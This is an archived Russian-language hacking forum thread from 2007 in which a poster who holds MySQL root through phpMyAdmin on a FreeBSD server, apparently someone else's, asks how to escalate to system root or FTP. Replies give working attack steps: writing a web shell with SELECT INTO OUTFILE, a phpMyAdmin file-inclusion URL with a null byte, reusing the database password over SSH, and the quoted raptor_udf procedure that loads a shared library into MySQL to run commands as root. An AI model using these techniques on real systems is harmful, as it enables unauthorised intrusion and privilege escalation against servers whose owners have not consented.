Имею рута Mysql на FreeBSD - помогите поиметь больше [Архив]

Просмотр полной версии : Имею рута Mysql на FreeBSD - помогите поиметь больше

undewaternemo

25.03.2007, 03:07

Имею рута Mysql на FreeBSD - помогите поиметь больше

Есть сервер FreeBSD
на нем через phphmyadmin имею рутовский доступ к mysql
Welcome to phpMyAdmin 2.6.1-pl2
MySQL 4.1.14 running on localhost as root@localhost

посмотрел через LOAD_FILE данные - нашел 1 домен на сервере
посмотрел папки что в корне домена - нет ниодной с правами записаи

Помогите с технологией - как поиметь рута или фтп на этом сервере

p.s. то Админы - третий раз пишу этот пост - что то в дргом разделе не проходил он
если вдруг вылезут все мессаджи -то не ругайте - а просто кильните все кроме этого

Isis

25.03.2007, 06:55

Залей шелл, через мускл.....подробнее здесь (http://hackedpro.org/index.php?name=Pages&op=page&pid=43&pagenum=2)

undewaternemo

25.03.2007, 10:43

Залей шелл, через мускл.....подробнее здесь (http://hackedpro.org/index.php?name=Pages&op=page&pid=43&pagenum=2)

я написал в первом посту что папок для записи в вебовской директории необнаружено.
поэтому не могу выполнить
select 'test' into outfile '/www/xx/xxxxxxxx.com/test.php';

вываливается
#1 - Can't create/write to file '/www/xx/xxxxxxxx.com/test.php' (Errcode: 13)

путь такой существует - если ошибаюсь с путем то вываливается (Errcode: 2)

подскажите - что можно сделать в такой ситуации

p.s нашел phpinfo на этой машинке
выдает
PHP Version 5.2.1

blackybr

25.03.2007, 13:18

вываливается
#1 - Can't create/write to file '/www/xx/xxxxxxxx.com/test.php' (Errcode: 13)

ищи дир доступную на запись.. аеще луче делай шелл инто аутфайл а потом

сайт/phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=блабла%00

инклудь тот шелл что в тмп.. версия как раз подходящая

p-range

25.03.2007, 17:08

неужели в базе нет полезной инфы?

fucker"ok

25.03.2007, 18:01

Имея рута в mysql не означает, что ты имеешь рут в самой системе. Просто у тебя есть максимальные права на управление базой. Вот и все. Залив шелл у тебя будет обычный шелл с правами вебсервера, но никак не с root :)

p-range

25.03.2007, 22:30

для начала попробуй войти под рутом, либо админом по ssh с тем же паролем что и к бд.

+toxa+

25.03.2007, 22:38

http://milw0rm.com/exploits/1181
http://milw0rm.com/exploits/1518

* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf.c
* $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
* mysql> create function do_system returns integer soname 'raptor_udf.so';
* mysql> select * from mysql.func;
* +-----------+-----+---------------+----------+
* | name | ret | dl | type |
* +-----------+-----+---------------+----------+
* | do_system | 2 | raptor_udf.so | function |
* +-----------+-----+---------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]

всё что те осталось это шелл и удача

p-range

25.03.2007, 23:46

вот именно что интерактивный шелл нужен))